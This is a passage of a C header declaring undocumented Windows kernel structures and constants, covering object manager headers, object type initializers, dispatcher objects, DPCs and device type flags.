(33L)\n#define SE_TIME_ZONE_PRIVILEGE (34L)\n#define SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35L)\n#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_CREATE_SYMBOLIC_LINK_PRIVILEGE\n\n#ifndef NT_SUCCESS\n#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)\n#endif\n\n/*\n** OBJECT MANAGER START\n*/\n\n//\n// Header flags\n//\n\n#define OB_FLAG_NEW_OBJECT 0x01\n#define OB_FLAG_KERNEL_OBJECT 0x02\n#define OB_FLAG_CREATOR_INFO 0x04\n#define OB_FLAG_EXCLUSIVE_OBJECT 0x08\n#define OB_FLAG_PERMANENT_OBJECT 0x10\n#define OB_FLAG_DEFAULT_SECURITY_QUOTA 0x20\n#define OB_FLAG_SINGLE_HANDLE_ENTRY 0x40\n#define OB_FLAG_DELETED_INLINE 0x80\n\n//\n// InfoMask values\n//\n\n#define OB_INFOMASK_PROCESS_INFO\t0x10\n#define OB_INFOMASK_QUOTA\t\t\t0x08\n#define OB_INFOMASK_HANDLE\t\t\t0x04\n#define OB_INFOMASK_NAME\t\t\t0x02\n#define OB_INFOMASK_CREATOR_INFO\t0x01\n\ntypedef PVOID *PDEVICE_MAP;\n\ntypedef struct _OBJECT_DIRECTORY_ENTRY {\n\tPVOID ChainLink;\n\tPVOID Object;\n\tULONG HashValue;\n} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY;\n\ntypedef struct _EX_PUSH_LOCK {\n\tunion\n\t{\n\t\tULONG Locked : 1;\n\t\tULONG Waiting : 1;\n\t\tULONG Waking : 1;\n\t\tULONG MultipleShared : 1;\n\t\tULONG Shared : 28;\n\t\tULONG Value;\n\t\tPVOID Ptr;\n\t};\n} EX_PUSH_LOCK, *PEX_PUSH_LOCK;\n\ntypedef struct _OBJECT_NAMESPACE_LOOKUPTABLE {\n\tLIST_ENTRY HashBuckets[37];\n\tEX_PUSH_LOCK Lock;\n\tULONG NumberOfPrivateSpaces;\n} OBJECT_NAMESPACE_LOOKUPTABLE, *POBJECT_NAMESPACE_LOOKUPTABLE;\n\ntypedef struct _OBJECT_NAMESPACE_ENTRY {\n\tLIST_ENTRY ListEntry;\n\tPVOID NamespaceRootDirectory;\n\tULONG SizeOfBoundaryInformation;\n\tULONG Reserved;\n\tUCHAR HashValue;\n\tULONG Alignment;\n} OBJECT_NAMESPACE_ENTRY, *POBJECT_NAMESPACE_ENTRY;\n\ntypedef struct _OBJECT_DIRECTORY {\n\tPOBJECT_DIRECTORY_ENTRY HashBuckets[37];\n\tEX_PUSH_LOCK Lock;\n\tPDEVICE_MAP DeviceMap;\n\tULONG SessionId;\n\tPVOID NamespaceEntry;\n\tULONG Flags;\n} OBJECT_DIRECTORY, *POBJECT_DIRECTORY;\n\ntypedef struct _OBJECT_HEADER_NAME_INFO {\n\tPOBJECT_DIRECTORY Directory;\n\tUNICODE_STRING Name;\n\tULONG QueryReferences;\n} OBJECT_HEADER_NAME_INFO, *POBJECT_HEADER_NAME_INFO;\n\ntypedef struct _OBJECT_HEADER_CREATOR_INFO {// Size=32\n\tLIST_ENTRY TypeList; // Size=16 Offset=0\n\tPVOID CreatorUniqueProcess; // Size=8 Offset=16\n\tUSHORT CreatorBackTraceIndex; // Size=2 Offset=24\n\tUSHORT Reserved; // Size=2 Offset=26\n} OBJECT_HEADER_CREATOR_INFO, *POBJECT_HEADER_CREATOR_INFO;\n\ntypedef struct _OBJECT_HANDLE_COUNT_ENTRY {// Size=16\n\tPVOID Process; // Size=8 Offset=0\n\tstruct\n\t{\n\t\tunsigned long HandleCount : 24; // Size=4 Offset=8 BitOffset=0 BitCount=24\n\t\tunsigned long LockCount : 8; // Size=4 Offset=8 BitOffset=24 BitCount=8\n\t};\n} OBJECT_HANDLE_COUNT_ENTRY, *POBJECT_HANDLE_COUNT_ENTRY;\n\ntypedef struct _OBJECT_HEADER_HANDLE_INFO // Size=16\n{\n\tunion\n\t{\n\t\tPVOID HandleCountDataBase; // Size=8 Offset=0\n\t\tstruct _OBJECT_HANDLE_COUNT_ENTRY SingleEntry; // Size=16 Offset=0\n\t};\n} OBJECT_HEADER_HANDLE_INFO, *POBJECT_HEADER_HANDLE_INFO;\n\ntypedef struct _OBJECT_HEADER_PROCESS_INFO { // Size=16\n\tPVOID ExclusiveProcess; // Size=8 Offset=0\n\tunsigned __int64 Reserved; // Size=8 Offset=8\n} OBJECT_HEADER_PROCESS_INFO, *POBJECT_HEADER_PROCESS_INFO;\n\ntypedef struct _OBJECT_HEADER_QUOTA_INFO {\n\tULONG PagedPoolCharge; //4\n\tULONG NonPagedPoolCharge; //4 \n\tULONG SecurityDescriptorCharge; //4\n\tPVOID SecurityDescriptorQuotaBlock; //sizeof(pointer)\n\tunsigned __int64 Reserved; //sizeof(uint64)\n} OBJECT_HEADER_QUOTA_INFO, *POBJECT_HEADER_QUOTA_INFO;\n\ntypedef struct _QUAD {\n\tunion\n\t{\n\t\tINT64 UseThisFieldToCopy;\n\t\tfloat DoNotUseThisField;\n\t};\n} QUAD, *PQUAD;\n\ntypedef struct _OBJECT_CREATE_INFORMATION {\n\tULONG Attributes;\n\tPVOID RootDirectory;\n\tCHAR ProbeMode;\n\tULONG PagedPoolCharge;\n\tULONG NonPagedPoolCharge;\n\tULONG SecurityDescriptorCharge;\n\tPVOID SecurityDescriptor;\n\tPSECURITY_QUALITY_OF_SERVICE SecurityQos;\n\tSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;\n} OBJECT_CREATE_INFORMATION, *POBJECT_CREATE_INFORMATION;\n\ntypedef enum _POOL_TYPE {\n\tNonPagedPool = 0,\n\tNonPagedPoolExecute = 0,\n\tPagedPool = 1,\n\tNonPagedPoolMustSucceed = 2,\n\tDontUseThisType = 3,\n\tNonPagedPoolCacheAligned = 4,\n\tPagedPoolCacheAligned = 5,\n\tNonPagedPoolCacheAlignedMustS = 6,\n\tMaxPoolType = 7,\n\tNonPagedPoolBase = 0,\n\tNonPagedPoolBaseMustSucceed = 2,\n\tNonPagedPoolBaseCacheAligned = 4,\n\tNonPagedPoolBaseCacheAlignedMustS = 6,\n\tNonPagedPoolSession = 32,\n\tPagedPoolSession = 33,\n\tNonPagedPoolMustSucceedSession = 34,\n\tDontUseThisTypeSession = 35,\n\tNonPagedPoolCacheAlignedSession = 36,\n\tPagedPoolCacheAlignedSession = 37,\n\tNonPagedPoolCacheAlignedMustSSession = 38,\n\tNonPagedPoolNx = 512,\n\tNonPagedPoolNxCacheAligned = 516,\n\tNonPagedPoolSessionNx = 544\n} POOL_TYPE;\n\ntypedef struct _OBJECT_TYPE_INITIALIZER_V1 {\n\tUSHORT Length;\n\tBOOLEAN UseDefaultObject;\n\tBOOLEAN Reserved1;\n\tULONG InvalidAttributes;\n\tGENERIC_MAPPING GenericMapping;\n\tACCESS_MASK ValidAccessMask;\n\tBOOLEAN SecurityRequired;\n\tBOOLEAN MaintainHandleCount;\n\tBOOLEAN MaintainTypeList;\n\tUCHAR Reserved2;\n\tBOOLEAN PagedPool;\n\tULONG DefaultPagedPoolCharge;\n\tULONG DefaultNonPagedPoolCharge;\n\tPVOID DumpProcedure;\n\tPVOID OpenProcedure;\n\tPVOID CloseProcedure;\n\tPVOID DeleteProcedure;\n\tPVOID ParseProcedure;\n\tPVOID SecurityProcedure;\n\tPVOID QueryNameProcedure;\n\tPVOID OkayToCloseProcedure;\n} OBJECT_TYPE_INITIALIZER_V1, *POBJECT_TYPE_INITIALIZER_V1;\n\ntypedef struct _OBJECT_TYPE_INITIALIZER_V2 {// Size=120\n\tUSHORT Length; // Size=2 Offset=0\n\tUCHAR ObjectTypeFlags; // Size=1 Offset=2\n\tULONG ObjectTypeCode; // Size=4 Offset=4\n\tULONG InvalidAttributes; // Size=4 Offset=8\n\tGENERIC_MAPPING GenericMapping; // Size=16 Offset=12\n\tULONG ValidAccessMask; // Size=4 Offset=28\n\tULONG RetainAccess; // Size=4 Offset=32\n\tPOOL_TYPE PoolType; // Size=4 Offset=36\n\tULONG DefaultPagedPoolCharge; // Size=4 Offset=40\n\tULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44\n\tPVOID DumpProcedure; // Size=8 Offset=48\n\tPVOID OpenProcedure; // Size=8 Offset=56\n\tPVOID CloseProcedure; // Size=8 Offset=64\n\tPVOID DeleteProcedure; // Size=8 Offset=72\n\tPVOID ParseProcedure; // Size=8 Offset=80\n\tPVOID SecurityProcedure; // Size=8 Offset=88\n\tPVOID QueryNameProcedure; // Size=8 Offset=96\n\tPVOID OkayToCloseProcedure; // Size=8 Offset=104\n} OBJECT_TYPE_INITIALIZER_V2, *POBJECT_TYPE_INITIALIZER_V2;\n\ntypedef struct _OBJECT_TYPE_INITIALIZER_V3 {// Size=120\n\tUSHORT Length; // Size=2 Offset=0\n\tUCHAR ObjectTypeFlags; // Size=1 Offset=2\n\tULONG ObjectTypeCode; // Size=4 Offset=4\n\tULONG InvalidAttributes; // Size=4 Offset=8\n\tGENERIC_MAPPING GenericMapping; // Size=16 Offset=12\n\tULONG ValidAccessMask; // Size=4 Offset=28\n\tULONG RetainAccess; // Size=4 Offset=32\n\tPOOL_TYPE PoolType; // Size=4 Offset=36\n\tULONG DefaultPagedPoolCharge; // Size=4 Offset=40\n\tULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44\n\tPVOID DumpProcedure; // Size=8 Offset=48\n\tPVOID OpenProcedure; // Size=8 Offset=56\n\tPVOID CloseProcedure; // Size=8 Offset=64\n\tPVOID DeleteProcedure; // Size=8 Offset=72\n\tPVOID ParseProcedure; // Size=8 Offset=80\n\tPVOID SecurityProcedure; // Size=8 Offset=88\n\tPVOID QueryNameProcedure; // Size=8 Offset=96\n\tPVOID OkayToCloseProcedure; // Size=8 Offset=104\n\tULONG WaitObjectFlagMask; // Size=4 Offset=112\n\tUSHORT WaitObjectFlagOffset; // Size=2 Offset=116\n\tUSHORT WaitObjectPointerOffset; // Size=2 Offset=118\n} OBJECT_TYPE_INITIALIZER_V3, *POBJECT_TYPE_INITIALIZER_V3;\n\ntypedef struct _OBJECT_TYPE_INITIALIZER {// Size=120\n\tUSHORT Length; // Size=2 Offset=0\n\tUCHAR ObjectTypeFlags; // Size=1 Offset=2\n\tULONG ObjectTypeCode; // Size=4 Offset=4\n\tULONG InvalidAttributes; // Size=4 Offset=8\n\tGENERIC_MAPPING GenericMapping; // Size=16 Offset=12\n\tULONG ValidAccessMask; // Size=4 Offset=28\n\tULONG RetainAccess; // Size=4 Offset=32\n\tPOOL_TYPE PoolType; // Size=4 Offset=36\n\tULONG DefaultPagedPoolCharge; // Size=4 Offset=40\n\tULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44\n\tPVOID DumpProcedure; // Size=8 Offset=48\n\tPVOID OpenProcedure; // Size=8 Offset=56\n\tPVOID CloseProcedure; // Size=8 Offset=64\n\tPVOID DeleteProcedure; // Size=8 Offset=72\n\tPVOID ParseProcedure; // Size=8 Offset=80\n\tPVOID SecurityProcedure; // Size=8 Offset=88\n\tPVOID QueryNameProcedure; // Size=8 Offset=96\n\tPVOID OkayToCloseProcedure; // Size=8 Offset=104\n} OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER;\n\ntypedef struct _OBJECT_TYPE_V2 {// Size=216\n\tLIST_ENTRY TypeList; // Size=16 Offset=0\n\tUNICODE_STRING Name; // Size=16 Offset=16\n\tPVOID DefaultObject; // Size=8 Offset=32\n\tUCHAR Index; // Size=1 Offset=40\n\tULONG TotalNumberOfObjects; // Size=4 Offset=44\n\tULONG TotalNumberOfHandles; // Size=4 Offset=48\n\tULONG HighWaterNumberOfObjects; // Size=4 Offset=52\n\tULONG HighWaterNumberOfHandles; // Size=4 Offset=56\n\tOBJECT_TYPE_INITIALIZER_V2 TypeInfo;\n\tEX_PUSH_LOCK TypeLock;\n\tULONG Key;\n\tLIST_ENTRY CallbackList;\n} OBJECT_TYPE_V2, *POBJECT_TYPE_V2;\n\ntypedef struct _OBJECT_TYPE_V3 {// Size=216\n\tLIST_ENTRY TypeList; // Size=16 Offset=0\n\tUNICODE_STRING Name; // Size=16 Offset=16\n\tPVOID DefaultObject; // Size=8 Offset=32\n\tUCHAR Index; // Size=1 Offset=40\n\tULONG TotalNumberOfObjects; // Size=4 Offset=44\n\tULONG TotalNumberOfHandles; // Size=4 Offset=48\n\tULONG HighWaterNumberOfObjects; // Size=4 Offset=52\n\tULONG HighWaterNumberOfHandles; // Size=4 Offset=56\n\tOBJECT_TYPE_INITIALIZER_V3 TypeInfo;\n\tEX_PUSH_LOCK TypeLock;\n\tULONG Key;\n\tLIST_ENTRY CallbackList;\n} OBJECT_TYPE_V3, *POBJECT_TYPE_V3;\n\ntypedef struct _OBJECT_TYPE_COMPATIBLE {\n\tLIST_ENTRY TypeList;\n\tUNICODE_STRING Name;\n\tPVOID DefaultObject;\n\tUCHAR Index;\n\tULONG TotalNumberOfObjects;\n\tULONG TotalNumberOfHandles;\n\tULONG HighWaterNumberOfObjects;\n\tULONG HighWaterNumberOfHandles;\n\tOBJECT_TYPE_INITIALIZER_V2 TypeInfo;\n} OBJECT_TYPE_COMPATIBLE, *POBJECT_TYPE_COMPATIBLE;\n\n/*\n** brand new header starting from 6.1\n*/\n\ntypedef struct _OBJECT_HEADER {\n\tLONG PointerCount;\n\tunion\n\t{\n\t\tLONG HandleCount;\n\t\tPVOID NextToFree;\n\t};\n\tEX_PUSH_LOCK Lock;\n\tUCHAR TypeIndex;\n\tUCHAR TraceFlags;\n\tUCHAR InfoMask;\n\tUCHAR Flags;\n\tunion\n\t{\n\t\tPOBJECT_CREATE_INFORMATION ObjectCreateInfo;\n\t\tPVOID QuotaBlockCharged;\n\t};\n\tPVOID SecurityDescriptor;\n\tQUAD Body;\n} OBJECT_HEADER, *POBJECT_HEADER;\n\n#define OBJECT_TO_OBJECT_HEADER(obj) \\\n CONTAINING_RECORD( (obj), OBJECT_HEADER, Body )\n\n/*\n** OBJECT MANAGER END\n*/\n\n/*\n* WDM START\n*/\n#define TIMER_TOLERABLE_DELAY_BITS 6\n#define TIMER_EXPIRED_INDEX_BITS 6\n#define TIMER_PROCESSOR_INDEX_BITS 5\n\ntypedef struct _DISPATCHER_HEADER {\n\tunion {\n\t\tunion {\n\t\t\tvolatile LONG Lock;\n\t\t\tLONG LockNV;\n\t\t} DUMMYUNIONNAME;\n\n\t\tstruct { // Events, Semaphores, Gates, etc.\n\t\t\tUCHAR Type; // All (accessible via KOBJECT_TYPE)\n\t\t\tUCHAR Signalling;\n\t\t\tUCHAR Size;\n\t\t\tUCHAR Reserved1;\n\t\t} DUMMYSTRUCTNAME;\n\n\t\tstruct { // Timer\n\t\t\tUCHAR TimerType;\n\t\t\tunion {\n\t\t\t\tUCHAR TimerControlFlags;\n\t\t\t\tstruct {\n\t\t\t\t\tUCHAR Absolute : 1;\n\t\t\t\t\tUCHAR Wake : 1;\n\t\t\t\t\tUCHAR EncodedTolerableDelay : TIMER_TOLERABLE_DELAY_BITS;\n\t\t\t\t} DUMMYSTRUCTNAME;\n\t\t\t};\n\n\t\t\tUCHAR Hand;\n\t\t\tunion {\n\t\t\t\tUCHAR TimerMiscFlags;\n\t\t\t\tstruct {\n\n#if !defined(KENCODED_TIMER_PROCESSOR)\n\n\t\t\t\t\tUCHAR Index : TIMER_EXPIRED_INDEX_BITS;\n\n#else\n\n\t\t\t\t\tUCHAR Index : 1;\n\t\t\t\t\tUCHAR Processor : TIMER_PROCESSOR_INDEX_BITS;\n\n#endif\n\n\t\t\t\t\tUCHAR Inserted : 1;\n\t\t\t\t\tvolatile UCHAR Expired : 1;\n\t\t\t\t} DUMMYSTRUCTNAME;\n\t\t\t} DUMMYUNIONNAME;\n\t\t} DUMMYSTRUCTNAME2;\n\n\t\tstruct { // Timer2\n\t\t\tUCHAR Timer2Type;\n\t\t\tunion {\n\t\t\t\tUCHAR Timer2Flags;\n\t\t\t\tstruct {\n\t\t\t\t\tUCHAR Timer2Inserted : 1;\n\t\t\t\t\tUCHAR Timer2Expiring : 1;\n\t\t\t\t\tUCHAR Timer2CancelPending : 1;\n\t\t\t\t\tUCHAR Timer2SetPending : 1;\n\t\t\t\t\tUCHAR Timer2Running : 1;\n\t\t\t\t\tUCHAR Timer2Disabled : 1;\n\t\t\t\t\tUCHAR Timer2ReservedFlags : 2;\n\t\t\t\t} DUMMYSTRUCTNAME;\n\t\t\t} DUMMYUNIONNAME;\n\n\t\t\tUCHAR Timer2Reserved1;\n\t\t\tUCHAR Timer2Reserved2;\n\t\t} DUMMYSTRUCTNAME3;\n\n\t\tstruct { // Queue\n\t\t\tUCHAR QueueType;\n\t\t\tunion {\n\t\t\t\tUCHAR QueueControlFlags;\n\t\t\t\tstruct {\n\t\t\t\t\tUCHAR Abandoned : 1;\n\t\t\t\t\tUCHAR DisableIncrement : 1;\n\t\t\t\t\tUCHAR QueueReservedControlFlags : 6;\n\t\t\t\t} DUMMYSTRUCTNAME;\n\t\t\t} DUMMYUNIONNAME;\n\n\t\t\tUCHAR QueueSize;\n\t\t\tUCHAR QueueReserved;\n\t\t} DUMMYSTRUCTNAME4;\n\n\t\tstruct { // Thread\n\t\t\tUCHAR ThreadType;\n\t\t\tUCHAR ThreadReserved;\n\t\t\tunion {\n\t\t\t\tUCHAR ThreadControlFlags;\n\t\t\t\tstruct {\n\t\t\t\t\tUCHAR CycleProfiling : 1;\n\t\t\t\t\tUCHAR CounterProfiling : 1;\n\t\t\t\t\tUCHAR GroupScheduling : 1;\n\t\t\t\t\tUCHAR AffinitySet : 1;\n\t\t\t\t\tUCHAR ThreadReservedControlFlags : 4;\n\t\t\t\t} DUMMYSTRUCTNAME;\n\t\t\t} DUMMYUNIONNAME;\n\n\t\t\tunion {\n\t\t\t\tUCHAR DebugActive;\n\n#if !defined(_X86_)\n\n\t\t\t\tstruct {\n\t\t\t\t\tBOOLEAN ActiveDR7 : 1;\n\t\t\t\t\tBOOLEAN Instrumented : 1;\n\t\t\t\t\tBOOLEAN Minimal : 1;\n\t\t\t\t\tBOOLEAN Reserved4 : 3;\n\t\t\t\t\tBOOLEAN UmsScheduled : 1;\n\t\t\t\t\tBOOLEAN UmsPrimary : 1;\n\t\t\t\t} DUMMYSTRUCTNAME;\n\n#endif\n\n\t\t\t} DUMMYUNIONNAME2;\n\t\t} DUMMYSTRUCTNAME5;\n\n\t\tstruct { // Mutant\n\t\t\tUCHAR MutantType;\n\t\t\tUCHAR MutantSize;\n\t\t\tBOOLEAN DpcActive;\n\t\t\tUCHAR MutantReserved;\n\t\t} DUMMYSTRUCTNAME6;\n\t} DUMMYUNIONNAME;\n\n\tLONG SignalState; // Object lock\n\tLIST_ENTRY WaitListHead; // Object lock\n} DISPATCHER_HEADER, *PDISPATCHER_HEADER;\n\ntypedef struct _KEVENT {\n\tDISPATCHER_HEADER Header;\n} KEVENT, *PKEVENT, *PRKEVENT;\n\ntypedef struct _KMUTANT {\n\tDISPATCHER_HEADER Header;\n\tLIST_ENTRY MutantListEntry;\n\tstruct _KTHREAD *OwnerThread;\n\tBOOLEAN Abandoned;\n\tUCHAR ApcDisable;\n} KMUTANT, *PKMUTANT, *PRKMUTANT, KMUTEX, *PKMUTEX, *PRKMUTEX;\n\ntypedef struct _KSEMAPHORE {\n\tDISPATCHER_HEADER Header;\n\tLONG Limit;\n} KSEMAPHORE, *PKSEMAPHORE, *PRKSEMAPHORE;\n\ntypedef struct _KTIMER {\n\tDISPATCHER_HEADER Header;\n\tULARGE_INTEGER DueTime;\n\tLIST_ENTRY TimerListEntry;\n\tstruct _KDPC *Dpc;\n\tULONG Processor;\n\tLONG Period;\n} KTIMER, *PKTIMER, *PRKTIMER;\n\ntypedef struct _KDEVICE_QUEUE_ENTRY {\n\tLIST_ENTRY DeviceListEntry;\n\tULONG SortKey;\n\tBOOLEAN Inserted;\n} KDEVICE_QUEUE_ENTRY, *PKDEVICE_QUEUE_ENTRY, *PRKDEVICE_QUEUE_ENTRY;\n\ntypedef enum _KDPC_IMPORTANCE {\n\tLowImportance,\n\tMediumImportance,\n\tHighImportance\n} KDPC_IMPORTANCE;\n\ntypedef struct _KDPC {\n\tunion {\n\t\tULONG TargetInfoAsUlong;\n\t\tstruct {\n\t\t\tUCHAR Type;\n\t\t\tUCHAR Importance;\n\t\t\tvolatile USHORT Number;\n\t\t} DUMMYSTRUCTNAME;\n\t} DUMMYUNIONNAME;\n\n\tSINGLE_LIST_ENTRY DpcListEntry;\n\tKAFFINITY ProcessorHistory;\n\tPVOID DeferredRoutine;\n\tPVOID DeferredContext;\n\tPVOID SystemArgument1;\n\tPVOID SystemArgument2;\n\t__volatile PVOID DpcData;\n} KDPC, *PKDPC, *PRKDPC;\n\ntypedef struct _WAIT_CONTEXT_BLOCK {\n\tunion {\n\t\tKDEVICE_QUEUE_ENTRY WaitQueueEntry;\n\t\tstruct {\n\t\t\tLIST_ENTRY DmaWaitEntry;\n\t\t\tULONG NumberOfChannels;\n\t\t\tULONG SyncCallback : 1;\n\t\t\tULONG DmaContext : 1;\n\t\t\tULONG Reserved : 30;\n\t\t};\n\t};\n\tPVOID DeviceRoutine;\n\tPVOID DeviceContext;\n\tULONG NumberOfMapRegisters;\n\tPVOID DeviceObject;\n\tPVOID CurrentIrp;\n\tPKDPC BufferChainingDpc;\n} WAIT_CONTEXT_BLOCK, *PWAIT_CONTEXT_BLOCK;\n\n#define MAXIMUM_VOLUME_LABEL_LENGTH (32 * sizeof(WCHAR)) // 32 characters\n\ntypedef struct _VPB {\n\tCSHORT Type;\n\tCSHORT Size;\n\tUSHORT Flags;\n\tUSHORT VolumeLabelLength; // in bytes\n\tstruct _DEVICE_OBJECT *DeviceObject;\n\tstruct _DEVICE_OBJECT *RealDevice;\n\tULONG SerialNumber;\n\tULONG ReferenceCount;\n\tWCHAR VolumeLabel[MAXIMUM_VOLUME_LABEL_LENGTH / sizeof(WCHAR)];\n} VPB, *PVPB;\n\ntypedef struct _KQUEUE {\n\tDISPATCHER_HEADER Header;\n\tLIST_ENTRY EntryListHead;\n\tULONG CurrentCount;\n\tULONG MaximumCount;\n\tLIST_ENTRY ThreadListHead;\n} KQUEUE, *PKQUEUE;\n\ntypedef struct _KDEVICE_QUEUE {\n\tCSHORT Type;\n\tCSHORT Size;\n\tLIST_ENTRY DeviceListHead;\n\tKSPIN_LOCK Lock;\n\n#if defined(_AMD64_)\n\n\tunion {\n\t\tBOOLEAN Busy;\n\t\tstruct {\n\t\t\tLONG64 Reserved : 8;\n\t\t\tLONG64 Hint : 56;\n\t\t};\n\t};\n\n#else\n\n\tBOOLEAN Busy;\n\n#endif\n\n} KDEVICE_QUEUE, *PKDEVICE_QUEUE, *PRKDEVICE_QUEUE;\n\nenum _KOBJECTS {\n\tEventNotificationObject = 0x0,\n\tEventSynchronizationObject = 0x1,\n\tMutantObject = 0x2,\n\tProcessObject = 0x3,\n\tQueueObject = 0x4,\n\tSemaphoreObject = 0x5,\n\tThreadObject = 0x6,\n\tGateObject = 0x7,\n\tTimerNotificationObject = 0x8,\n\tTimerSynchronizationObject = 0x9,\n\tSpare2Object = 0xa,\n\tSpare3Object = 0xb,\n\tSpare4Object = 0xc,\n\tSpare5Object = 0xd,\n\tSpare6Object = 0xe,\n\tSpare7Object = 0xf,\n\tSpare8Object = 0x10,\n\tSpare9Object = 0x11,\n\tApcObject = 0x12,\n\tDpcObject = 0x13,\n\tDeviceQueueObject = 0x14,\n\tEventPairObject = 0x15,\n\tInterruptObject = 0x16,\n\tProfileObject = 0x17,\n\tThreadedDpcObject = 0x18,\n\tMaximumKernelObject = 0x19,\n};\n\n#define DO_VERIFY_VOLUME 0x00000002 // ntddk nthal ntifs wdm\n#define DO_BUFFERED_IO 0x00000004 // ntddk nthal ntifs wdm\n#define DO_EXCLUSIVE 0x00000008 // ntddk nthal ntifs wdm\n#define DO_DIRECT_IO 0x00000010 // ntddk nthal ntifs wdm\n#define DO_MAP_IO_BUFFER 0x00000020 // ntddk nthal ntifs wdm\n#define DO_DEVICE_HAS_NAME 0x00000040 // ntddk nthal ntifs\n#define DO_DEVICE_INITIALIZING 0x00000080 // ntddk nthal ntifs wdm\n#define DO_SYSTEM_BOOT_PARTITION 0x00000100 // ntddk nthal ntifs\n#define DO_LONG_TERM_REQUESTS 0x00000200 // ntddk nthal ntifs\n#define DO_NEVER_LAST_DEVICE 0x00000400 // ntddk nthal ntifs\n#define DO_SHUTDOWN_REGISTERED 0x00000800 // ntddk nthal ntifs wdm\n#define DO_BUS_ENUMERATED_DEVICE 0x00001000 // ntddk nthal ntifs wdm\n#define DO_POWER_PAGABLE 0x00002000 // ntddk nthal ntifs wdm\n#define DO_POWER_INRUSH 0x00004000 // ntddk nthal ntifs wdm\n#define DO_POWER_NOOP 0x00008000\n#define DO_LOW_PRIORITY_FILESYSTEM 0x00010000 // ntddk nthal ntifs\n#define DO_XIP 0x00020000\n\n#define FILE_REMOVABLE_MEDIA 0x00000001\n#define FILE_READ_ONLY_DEVICE 0x00000002\n#define FILE_FLOPPY_DISKETTE 0x00000004\n#define FILE_WRITE_ONCE_MEDIA 0x00000008\n#define FILE_REMOTE_DEVICE 0x00000010\n#define FILE_DEVICE_IS_MOUNTED 0x00000020\n#define FILE_VIRTUAL_VOLUME 0x00000040\n#define FILE_AUTOGENERATED_DEVICE_NAME 0x00000080\n#define FILE_DEVICE_SECURE_OPEN 0x00000100\n#define FILE_CHARACTERISTIC_PNP_DEVICE 0x00000800\n#define FILE_CHARACTERISTIC_TS_DEVICE 0x00001000\n#define FILE_CHARACTERISTIC_WEBDAV_DEVICE 0x00002000\n#define FILE_CHARACTERISTIC_CSV 0x00010000\n#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL 0x00020000\n#define FILE_PORTABLE_DEVICE 0x00040000\n\n#define FILE_DEVICE_BEEP 0x00000001\n#define FILE_DEVICE_CD_ROM 0x00000002\n#define FILE_DEVICE_CD_ROM_FILE_SYSTEM 0x00000003\n#define FILE_DEVICE_CONTROLLER 0x00000004\n#define FILE_DEVICE_DATALINK 0x00000005\n#define FILE_DEVICE_DFS 0x00000006\n#define FILE_DEVICE_DISK 0x00000007\n#define FILE_DEVICE_DISK_FILE_SYSTEM 0x00000008\n#define FILE_DEVICE_FILE_SYSTEM 0x00000009\n#define FILE_DEVICE_INPORT_PORT 0x0000000a\n#define FILE_DEVICE_KEYBOARD 0x0000000b\n#define FILE_DEVICE_MAILSLOT 0x0000000c\n#define FILE_DEVICE_MIDI_IN 0x0000000d\n#define FILE_DEVICE_MIDI_OUT 0x0000000e\n#define FILE_DEVICE_MOUSE 0x0000000f\n#define FILE_DEVICE_MULTI_UNC_PROVIDER 0x00000010\n#define FILE_DEVICE_NAMED_PIPE 0x00000011\n#define FILE_DEVICE_NETWORK 0x00000012\n#define FILE_DEVICE_NETWORK_BROWSER 0x00000013\n#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014\n#define FILE_DEVICE_NULL 0x00000015\n#define FILE_DEVICE_PARALLEL_PORT 0x00000016\n#define FILE_DEVICE_PHYSICAL_NETCARD 0x00000017\n#define FILE_DEVICE_PRINTER 0x00000018\n#define FILE_DEVICE_SCANNER 0x00000019\n#define FILE_DEVICE_SERIAL_MOUSE_PORT 0x0000001a\n#define FILE_DEVICE_SERIAL_PORT 0x0000001b\n#define FILE_DEVICE_SCREEN 0x0000001c\n#define FILE_DEVICE_SOUND 0x0000001d\n#define FILE_DEVICE_STREAMS 0x0000001e\n#define FILE_DEVICE_TAPE 0x0000001f\n#define FILE_DEVICE_TAPE_FILE_SYSTEM 0x00000020\n#define FILE_DEVICE_TRANSPORT 0x00000021\n#define FILE_DEVICE_UNKNOWN 0x00000022\n#define FILE_DEVICE_VIDEO 0x00000023\n#define FILE_DEVICE_VIRTUAL_DISK 0x00000024\n#define FILE_DEVICE_WAVE_IN 0x00000025\n#define FILE_DEVICE_WAVE_OUT 0x00000026\n#define FILE_DEVICE_8042_PORT 0x00000027\n#define FILE_DEVICE_NETWORK_REDIRECTOR 0x00000028\n#define FILE_DEVICE_BATTERY 0x00000029\n#define FILE_DEVICE_BUS_EXTENDER 0x0000002a\n#define FILE_DEVICE_MODEM 0x0000002b\n#define FILE_DEVICE_VDM 0x0000002c\n#define FILE_DEVICE_MASS_STORAGE 0x0000002d\n#define FILE_DEVICE_SMB 0x0000002e\n#define FILE_DEVICE_KS 0x0000002f\n#define FILE_DEVICE_CHANGER 0x00000030\n#define FILE_DEVICE_SMARTCARD 0x00000031\n#define FILE_DEVICE_ACPI 0x00000032\n#define FILE_DEVICE_DVD 0x00000033\n#define FILE_DEVICE_FULLSCREEN_VIDEO 0x00000034\n#define FILE_DEVICE_DFS_FILE_SYSTEM 0x00000035\n#define FILE_DEVICE_DFS_VOLUME 0x00000036\n#define FILE_DEVICE_SERENUM 0x00000037\n#define FILE_DEVICE_TERMSRV 0x00000038\n#define FILE_DEVICE_KSEC 0x00000039\n#define FILE_DEVICE_FIPS 0x0000003A\n#define FILE_DEVICE_INFINIBAND 0x0000003B\n#define FILE_DEVICE_VMBUS 0x0000003E\n#define FILE_DEVICE_CRYPT_PROVIDER 0x0000003F\n#define FILE_DEVICE_WPD 0x00000040\n#define FILE_DEVICE_BLUETOOTH 0x00000041\n#define FILE_DEVICE_MT_COMPOSITE 0x00000042\n#define FILE_DEVICE_MT_TRANSPORT 0x00000043\n#define FILE_DEVICE_BIOMETRIC 0x00000044\n#define FILE_DEVICE_PMI 0x00000045\n#define FILE_DEVICE_EHSTOR 0x00000046\n#define FILE_DEVICE_DEVAPI 0x00000047\n#define FILE_DEVICE_GPIO 